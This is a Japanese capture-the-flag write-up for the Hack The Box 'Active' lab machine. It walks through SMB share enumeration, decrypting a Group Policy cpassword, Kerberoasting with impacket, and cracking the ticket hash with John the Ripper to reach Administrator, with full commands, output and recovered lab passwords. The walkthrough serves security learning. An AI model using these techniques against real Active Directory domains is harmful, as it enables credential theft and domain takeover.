ActiveはWindowsのマシンで、難易度はeasyです。
・使用ツール
smbmap
smbclient
impacket(GetUserSPNs.py)
john the Ripper
目次
1.Enumeration
Autoreconを実行してオープンポートを確認
smb,kerberosのサービスを利用していることを確認
# Nmap 7.91 scan initiated Sun Dec 27 17:07:45 2020 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /results/10.10.10.100/scans/<em>full_tcp_nmap.txt -oX /results/10.10.10.100/scans/xml/_full_tcp_nmap.xml 10.10.10.100 Increasing send delay for 10.10.10.100 from 0 to 5 due to 655 out of 2181 dropped probes since last increase. Nmap scan report for 10.10.10.100 Host is up, received user-set (0.17s latency). Scanned at 2020-12-27 17:07:46 UTC for 1308s Not shown: 65512 closed ports Reason: 65512 resets PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 126 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |</em> bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2020-12-27 17:31:36Z) 135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 126 464/tcp open kpasswd5? syn-ack ttl 126 593/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack ttl 126 3268/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 126 5722/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC 9389/tcp open mc-nmf syn-ack ttl 126 .NET Message Framing 47001/tcp open http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC 49153/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC 49154/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC 49155/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC 49157/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC 49169/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC 49171/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC 49182/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC Aggressive OS guesses: Microsoft Windows 7 SP1 or Windows Server 2008 (95%), Microsoft Windows 7 Ultimate (95%), Microsoft Windows 8.1 (95%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 (95%), Microsoft Windows Windows 7 SP1 (95%), Microsoft Windows Vista Home Premium SP1, Windows 7, or Windows Server 2008 (95%), Microsoft Windows Vista SP1 (95%), Microsoft Windows 7 SP1 (94%), Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Server 2008 R2 (92%) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=12/27%OT=53%CT=1%CU=38526%PV=Y%DS=3%DC=T%G=Y%TM=5FE8C4 OS:7E%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=I%CI=I%TS=7)OPS(O1= OS:M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11 OS:%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y OS:%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD OS:=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%D OS:F=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O OS:=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK OS:=G%RUD=G)IE(R=N) Uptime guess: 0.026 days (since Sun Dec 27 16:52:05 2020) Network Distance: 3 hops TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: Incremental Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: |<em>clock-skew: 3m44s | p2p-conficker: | Checking for Conficker.C or higher… | Check 1 (port 51123/tcp): CLEAN (Couldn't connect) | Check 2 (port 40109/tcp): CLEAN (Couldn't connect) | Check 3 (port 41936/udp): CLEAN (Timeout) | Check 4 (port 38631/udp): CLEAN (Failed to receive data) |</em> 0/4 checks are positive: Host is CLEAN or ports are blocked | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-12-27T17:33:06 |_ start_date: 2020-12-27T16:56:12 TRACEROUTE (using port 554/tcp) HOP RTT ADDRESS 1 0.05 ms 172.17.0.1 2 187.15 ms 10.10.14.1 3 187.52 ms 10.10.10.100 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . <h1>Nmap done at Sun Dec 27 17:29:34 2020 -- 1 IP address (1 host up) scanned in 1308.47 seconds
smbmapでアクセスできるファイルを確認
[!] RPC Authentication error occurred
[!] Authentication error on 10.10.10.100
[!] RPC Authentication error occurred
[!] Authentication error on 10.10.10.100
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
.\Replication*
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 active.htb
.\Replication\active.htb*
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 scripts
.\Replication\active.htb\DfsrPrivate*
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Installing
.\Replication\active.htb\Policies*
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\Replication\active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}*
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 10:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 USER
.\Replication\active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy*
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 10:38:11 2018 GPE.INI
.\Replication\active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE*
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 10:38:11 2018 Registry.pol
.\Replication\active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft*
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Windows NT
.\Replication\active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences*
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Groups
.\Replication\active.htb\Policies{6AC1786C-016F-11D2-945F-00C04fB984F9}*
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 10:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 USER
.\Replication\active.htb\Policies{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE*
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Microsoft
.\Replication\active.htb\Policies{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft*
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Windows NT
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[!] Authentication error on 10.10.10.100
\Groups\の配下には通常Groups.xmlが存在する
(smbmapの結果には見えていない)
smbclientコマンドでGroups.xmlを取得する
$ sudo smbclient -N -U "" //10.10.10.100/Replication
Try "help" to get a list of possible commands.
smb: cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
Groups.xmlの中身のuserName,cpasswordを確認
cpassword=”edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ”
serName=”active.htb\SVC_TGS”
$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
kali@kali:~/hackTheBox/Active/scans$
2.Exploitation
gpp-decryptを使用して、取得したcpasswordを解析する
$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" /usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated GPPstillStandingStrong2k18 kali@kali:~/hackTheBox/Active/scans$
下記の認証情報を使用してsmbに接続すると、Usersに読み取り権限がある
SVC_TGS
GPPstillStandingStrong2k18
$ smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
kali@kali:~/hackTheBox/Active/scans$
smbclientでUsersに接続し、user.txtを取得
$ sudo smbclient -U "SVC_TGS" //10.10.10.100/Users GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \>
smb: \> cd SVC_TGS
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt A 34 Sat Jul 21 11:06:25 2018
10459647 blocks of size 4096. 4925465 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \SVC_TGS\Desktop\>
Administratorには、アクセス権限がないので権限昇格が必要
$ sudo smbclient -U "SVC_TGS" //10.10.10.100/Users GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 4925465 blocks available
smb: \> cd Administrator\
smb: \Administrator\> ls
NT_STATUS_ACCESS_DENIED listing \Administrator\*
smb: \Administrator\>
3.Privilege Escalation
対象のホストはkerberosのサービスを使っているので、impacketを使用して、TGSのチケットを取得する
$ cd /opt/impacket/examples $ python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 /home/kali/.local/lib/python2.7/site-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release. from cryptography import x509 Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2018-07-30 13:17:40.656520 $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$5b05e4eb923c30cf7e15fdd64c1b6f15$e863370e766db3d4b72a1033e563ca3b4270e5fe76fe8d864b1c8aaba5341813435c4cfd603cf9609700ad1cc92f726ae5c33d6ba2df4432ce34dd110eab04719fb332d4d9564fb7899b674f27a7a3c62bcd773e00f360a642b342c6e0a8e1a2c57ebea7ef41044859d17bb8cafe005d5e860440e3e3d5178900adcb353733cf34cd0c4adec5c05268160be1bab5cb565a7e30176922b3cb9cee1b5f2b9bc1fdcaa1cea8de92c142e930cb7261c66f5f96d17c398c077585b1a31f731ed537bffd5a421d1142be614c56b884e7bb9fdb49d911d7f6b082c63177a5c15cc97b0ea60deabaa44c56bbacf69162d4a78bdc06a24afcc18ab9847223103115226bf4483b03e1c0fc13de66f2195426b4f728d4c4297076baecd1b8145ee3d2d13c18ab51cf040d6e9761a0aef799be16fc15c5fa215c97331ddb966a32632916e34f82d0a325a932cf2225854dcdebb475b6f4f514deb561a5eced41dd59cd9db1bc2872bbc7fa47869363576f0ff678c3cdd7dea3225b154e9a5c14d473a0bf5190a8a7801728361a642fe0d130290b391f6a9c2baf118a520856288ec2b884f169bbb4c55b8d30795216757cdc550912ee7c538772fc97527d26107bc49e29fe4340faa3736edb486bc8dd2f2ecab9f38d96e68a341eb3cafe71a965f4703ed53dfef425fc187c69831e466c29feb6b2e254b9b8cc3ebf3a0ec7c6396f675b13bc50955b113afd02721d16284cfbbaec69e9f37594083ac0aac76b08d176c8294dc9e1367575754d634706e1d62315429bcec64badf488ef30b1e468c1c86d66d791a6058fed40d8048eed77bd772bf802a741ee571572959d1f13a928ad69dc5a118323643c5b237434f1adf191b5d6e9499de9993153be15196db14bbd1a038ba3b3254b3e2107db81b95963753d613d1b1b0ce43171f50295ac22597d0c46ba4d90fdbde2c4841d3db4a79638f679a73aff327966f1a049956b050d18aa2f76d2bacd4f6b5957da6b074ca5d7a6bd5a5b8734cca0bbcdc631bbaa93c4508a89aa3d01f6639ab4fff56d0c772e33eb79edc98d25c76624080d89bcd71d7b28f0f6c5a71873091a1205fa2b95e4eadbed07f1af7695d8587a6326a961cd73fbfa39cec99a2a23025e2609106e08528e6a7a458bebc075bf5848721e5ad8ab3ca2973957f540c229b68d7039752abf6b8b09e720d23eed8fcac38f98ce2a36cfd967d5186c44847b795484132607932203174add04bcbc214eb50d kali@kali:/opt/impacket/examples$
取得したハッシュを保存し、john the Ripperで解析する
パスワードが「Ticketmaster1968」であることを確認
$ cat hash.txt $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$5b05e4eb923c30cf7e15fdd64c1b6f15$e863370e766db3d4b72a1033e563ca3b4270e5fe76fe8d864b1c8aaba5341813435c4cfd603cf9609700ad1cc92f726ae5c33d6ba2df4432ce34dd110eab04719fb332d4d9564fb7899b674f27a7a3c62bcd773e00f360a642b342c6e0a8e1a2c57ebea7ef41044859d17bb8cafe005d5e860440e3e3d5178900adcb353733cf34cd0c4adec5c05268160be1bab5cb565a7e30176922b3cb9cee1b5f2b9bc1fdcaa1cea8de92c142e930cb7261c66f5f96d17c398c077585b1a31f731ed537bffd5a421d1142be614c56b884e7bb9fdb49d911d7f6b082c63177a5c15cc97b0ea60deabaa44c56bbacf69162d4a78bdc06a24afcc18ab9847223103115226bf4483b03e1c0fc13de66f2195426b4f728d4c4297076baecd1b8145ee3d2d13c18ab51cf040d6e9761a0aef799be16fc15c5fa215c97331ddb966a32632916e34f82d0a325a932cf2225854dcdebb475b6f4f514deb561a5eced41dd59cd9db1bc2872bbc7fa47869363576f0ff678c3cdd7dea3225b154e9a5c14d473a0bf5190a8a7801728361a642fe0d130290b391f6a9c2baf118a520856288ec2b884f169bbb4c55b8d30795216757cdc550912ee7c538772fc97527d26107bc49e29fe4340faa3736edb486bc8dd2f2ecab9f38d96e68a341eb3cafe71a965f4703ed53dfef425fc187c69831e466c29feb6b2e254b9b8cc3ebf3a0ec7c6396f675b13bc50955b113afd02721d16284cfbbaec69e9f37594083ac0aac76b08d176c8294dc9e1367575754d634706e1d62315429bcec64badf488ef30b1e468c1c86d66d791a6058fed40d8048eed77bd772bf802a741ee571572959d1f13a928ad69dc5a118323643c5b237434f1adf191b5d6e9499de9993153be15196db14bbd1a038ba3b3254b3e2107db81b95963753d613d1b1b0ce43171f50295ac22597d0c46ba4d90fdbde2c4841d3db4a79638f679a73aff327966f1a049956b050d18aa2f76d2bacd4f6b5957da6b074ca5d7a6bd5a5b8734cca0bbcdc631bbaa93c4508a89aa3d01f6639ab4fff56d0c772e33eb79edc98d25c76624080d89bcd71d7b28f0f6c5a71873091a1205fa2b95e4eadbed07f1af7695d8587a6326a961cd73fbfa39cec99a2a23025e2609106e08528e6a7a458bebc075bf5848721e5ad8ab3ca2973957f540c229b68d7039752abf6b8b09e720d23eed8fcac38f98ce2a36cfd967d5186c44847b795484132607932203174add04bcbc214eb50d $ sudo john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Ticketmaster1968 (?) 1g 0:00:00:08 DONE (2020-12-28 00:18) 0.1113g/s 1173Kp/s 1173Kc/s 1173KC/s Tiffani1432..Thrash1 Use the "--show" option to display all of the cracked passwords reliably Session completed
取得した認証情報で接続してroot.txtを取得する
$ sudo smbclient -U "administrator" //10.10.10.100/Users Ticketmaster1968 Try "help" to get a list of possible commands. smb: \> cd Administrator\Desktop\ smb: \Administrator\Desktop\> get root.txt getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) smb: \Administrator\Desktop\>